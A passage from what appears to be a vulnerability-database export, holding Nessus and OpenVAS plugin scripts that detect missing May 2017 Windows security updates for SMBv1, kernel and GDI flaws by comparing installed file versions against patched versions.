vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018196/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018466/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018556/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018821/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018885/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018927/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019149/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019204/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019206/title\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-05';\n\nkbs = make_list(\n \"4018196\", \n \"4018466\",\n \"4018556\",\n \"4018821\",\n \"4018885\",\n \"4018927\",\n \"4019149\",\n \"4019204\",\n \"4019206\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB4018196 Applies only to hosts having 'DNS Server' role installed\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\ndns_role_installed = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\DNS\\DisplayName\"\n);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4018196\nif (!isnull(dns_role_installed))\n{\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"dns-server-service_31bf3856ad364e35_\", file_pat:\"^dns\\.exe$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018196\", session:the_session);\n}\n\n# 4018466\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35_\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19673','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018466\", session:the_session);\n\n# 4018556\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"com-base-qfe-ole32_31bf3856ad364e35_\", file_pat:\"^ole32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19773','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018556\", session:the_session);\n\n# 4018821\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19762','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018821\", session:the_session);\n\n# 4018885\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tcpip-binaries_31bf3856ad364e35_\", file_pat:\"^tcpip\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19763','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018885\", session:the_session);\n\n# 4018927\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rds-datafactory-dll_31bf3856ad364e35_\", file_pat:\"^msadcf\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19770','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018927\", session:the_session);\n\n# 4019149\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"lddmcore_31bf3856ad364e35_\", file_pat:\"^dxgkrnl\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19765','7.0.6002.24089'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4019149\", session:the_session);\n\n# 4019204\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35_\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19778','6.0.6002.24095'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019204\", session:the_session);\n\n# 4019206\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35_\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019206\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0272", "vpr": {"risk factor": "Critical", "score": "9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-05-09T00:00:00", "vulnerabilityPublicationDate": "2017-05-09T00:00:00", "exploitableWith": ["Core Impact"]}

{"openvas": [{"lastseen": "2020-06-08T23:22:43", "description": "This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Monthly Rollup (KB4019264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0231", "CVE-2017-0244", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0269", "CVE-2017-0220", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0245", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-8552", "CVE-2017-0268", "CVE-2017-0242", "CVE-2017-0213", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246", "CVE-2017-0175"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811114", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811114", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Monthly Rollup (KB4019264)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811114\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0175\",\n \"CVE-2017-0190\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0220\",\n \"CVE-2017-0222\", \"CVE-2017-0231\", \"CVE-2017-0242\", \"CVE-2017-0244\",\n \"CVE-2017-0245\", \"CVE-2017-0246\", \"CVE-2017-0258\", \"CVE-2017-0263\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\", \"CVE-2017-8552\");\n script_bugtraq_id(98121, 98114, 98097, 98110, 98298, 98102, 98103, 98111, 98127,\n 98173, 98275, 98109, 98115, 98108, 98112, 98258, 98259, 98261,\n 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270,\n 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:07:03 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Monthly Rollup (KB4019264)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update (monthly rollup) according to Microsoft KB4019264.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue where applications that use msado15.dll stop working after\n installing security update 4015550.\n\n - Deprecated SHA-1 Microsoft Edge and Internet Explorer 11 for SSL/TLS Server\n Authentication.\n\n - Updated Internet Explorer 11's New Tab Page with an integrated newsfeed.\n\n - Includes security updates to Microsoft Graphics Component, Microsoft Windows\n DNS, Windows COM, Windows Server, Windows kernel, and Internet Explorer.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute code or elevate user privileges, take control of the affected system,\n bypass security restrictions, conduct denial-of-service condition, gain access\n to potentially sensitive information and spoof content by tricking a user by\n redirecting the user to a specially crafted website.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019264\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp( win7:2, win7x64:2, win2008r2:2 ) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.1.7601.23775\"))\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23775\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:47:51", "description": "This host is missing a critical/important\n security update according to Microsoft KB4018466", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft SMB Multiple Vulnerabilities (KB4018466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0269", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0268", "CVE-2017-0276"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811117", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811117", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft SMB Multiple Vulnerabilities (KB4018466)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811117\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266,\n 98267, 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:51:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft SMB Multiple Vulnerabilities (KB4018466)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4018466\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the error in\n the way Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause the affected system to stop responding until it is manually\n restarted. Also successful exploitation will allow attacker to get sensitive\n data and execute arbitrary code in context of current user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018466\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025687\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3,\n win2008:3, winVistax64:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\")){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n\n if(version_is_less(version:asVer, test_version:\"6.0.6002.19765\"))\n {\n Vulnerable_range = \"Less than 6.0.6002.19765\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:asVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24088\"))\n {\n Vulnerable_range = \"6.0.6002.22000 - 6.0.6002.24088\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:asVer, test_version:\"5.1.2600.7238\"))\n {\n Vulnerable_range = \"Less than 5.1.2600.7238\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n{\n if(version_is_less(version:asVer, test_version:\"5.2.3790.6051\"))\n {\n Vulnerable_range = \"Less than 5.2.3790.6051\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:18:57", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019623", "cvss3": {}, "published": "2017-06-19T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019623)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0280", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0270", "CVE-2017-0269", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0268", "CVE-2017-0276"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811209", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811209", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019623)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811209\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266,\n 98267, 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-19 11:10:25 +0530 (Mon, 19 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019623)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019623\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the error in\n the way Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause the affected system to stop responding until it is manually\n restarted. Also successful exploitation will allow attacker to get sensitive\n data and execute arbitrary code in context of current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8 x86/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019623\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025687\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n 